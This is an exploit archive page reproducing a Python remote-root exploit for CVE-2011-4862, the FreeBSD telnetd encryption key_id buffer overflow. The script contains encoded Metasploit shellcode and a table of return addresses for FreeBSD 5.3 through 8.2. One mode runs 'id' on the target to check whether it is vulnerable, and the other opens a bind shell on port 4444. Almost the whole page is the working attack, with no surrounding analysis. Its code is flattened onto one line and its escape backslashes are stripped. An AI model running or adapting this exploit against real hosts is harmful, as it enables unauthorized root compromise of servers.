Home / exploits FreeBSD telnetd Remote Root
Posted on 16 January 2012
#!/usr/bin/env python # Checks/exploits CVE-2011-4862 (remote root in encryption supporting telnetd) in multiple FreeBSD versions. # Author: Knull of http://leethack.info # References: # Metasploit module, http://www.metasploit.com/modules/exploit/freebsd/telnet/telnet_encrypt_keyid # FreeBSD advisory, http://lists.freebsd.org/pipermail/freebsd-announce/2011-December/001398.html import random, string, struct, socket, time, sys def usage(): print "Usage: " + sys.argv[0] + " [Option] host Options: -c check if telnetd is vulnerable and running as root (runs command `id` on host) -e exploit host (opens a bindshell on port 4444) " if len(sys.argv) == 3: host = sys.argv[2].rstrip() port = 23 if sys.argv[1] == '-c': # slightly modified version of metasploits bsd/x86/exec: # # bsd/x86/exec - 71 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # AppendExit=false, CMD=id, PrependSetresuid=false, # PrependSetuid=false, VERBOSE=false, PrependSetreuid=false buf = "xdaxd0xb8x7bx91x45xc5xd9x74x24xf4x5dx2bxc9xb1x0cx31x45x17x03x45x17x83x96x6dxa7x30x02xb5x70x22x80xa1xadx37x24x32x27x50x76x5ax59xb0x05xf2xcdxe1xc6x60x67x77xfbx37x9fx84xfbxb7x5fxe2x9fxb7x08xa7xd6x59xe4x16xbbxc9xc4x19" elif sys.argv[1] == '-e': # slightly modified version of metasploits bsd/x86/shell_bind_tcp: # # bsd/x86/shell_bind_tcp - 100 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # AutoRunScript=, AppendExit=false, PrependSetresuid=false, # InitialAutoRunScript=, PrependSetuid=false, LPORT=4444, # VERBOSE=false, RHOST=, PrependSetreuid=false buf = "xdaxc8xbex7bxd4xeax14xd9x74x24xf4x58x2bxc9xb1x13x31x70x18x83xc0x04x03x70x6fx36x1fx25x4fxe6x88xb9x4dx16x15xcfxb6x48xcfxcex52x6bx65xc1x12x0axb4x61x05x9dx16x08xc1x45x5ax4cx98x31x88xfdxf0x70xd0x4ex1ax46x51xfex72x32x08xa7xbfx42x53x18xdbx3ax5axf7x4bx92x8dx8bxe3x84xfex09x9ax3ax88x2dx0cx97xd9xe1x1cx2cx13x81" else: usage() exit() else: usage() exit() socket.setdefaulttimeout(10) rg = random.SystemRandom() alnum = string.letters[0:52] + string.digits def rand_alnumlst(length): return list(''.join(rg.choice(alnum) for _ in range(length))) enc_init = "xffxfax26x00x01x01x12x13x14x15x16x17x18x19xffxf0" enc_keyid = "xffxfax26x07" end_suboption = "xffxf0" # ret values for multiple FreeBSD versions rets = 0x0804a8a9, 0x0804a889, 0x0804a869, 0x08057bd0, 0x0804c4e0, 0x0804a5b4, 0x08052925, 0x0804cf31, 0x8059730 version = '8.2', '8.1', '8.0', '7.3/7.4', '7.0/7.1/7.2', '6.3/6.4', '6.0/6.1/6.2', '5.5', '5.3' # display banner print "Vulnerability checker/exploit for CVE-2011-4862 (FreeBSD telnetd encryption)" print "by Knull, http://leethack.info " count = 0 tried = 0 # loop through the ret's until one works for ret in rets: key_id = rand_alnumlst(400) key_id[0:1] = "xebx76" key_id[72:75] = struct.pack('<I', ret - 20) key_id[76:79] = struct.pack('<I', ret) key_id[80:191] = rand_alnumlst(112) key_id[120:121] = "xebx46" key_id[192:191+len(buf)] = buf s = '' for i in key_id: s += ''.join(i) sploit = enc_keyid + s + end_suboption print "Trying FreeBSD " + version[count] + "... " try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((host, port)) sock.send(enc_init) data = sock.recv(32) sock.send(sploit) data = sock.recv(32) time.sleep(0.5) if data: sock.send(sploit) time.sleep(0.5) if sys.argv[1] == '-e': tried = 1 sock.close() elif sys.argv[1] == '-c': result = sock.recv(128) sock.close() if result.find("root") != -1: print host + " is vulnerable, result of command: id " + result exit() sock.close() except socket.error: pass count+=1 if tried: print "Sent payloads, check bindshell on " + host + ", port 4444 "
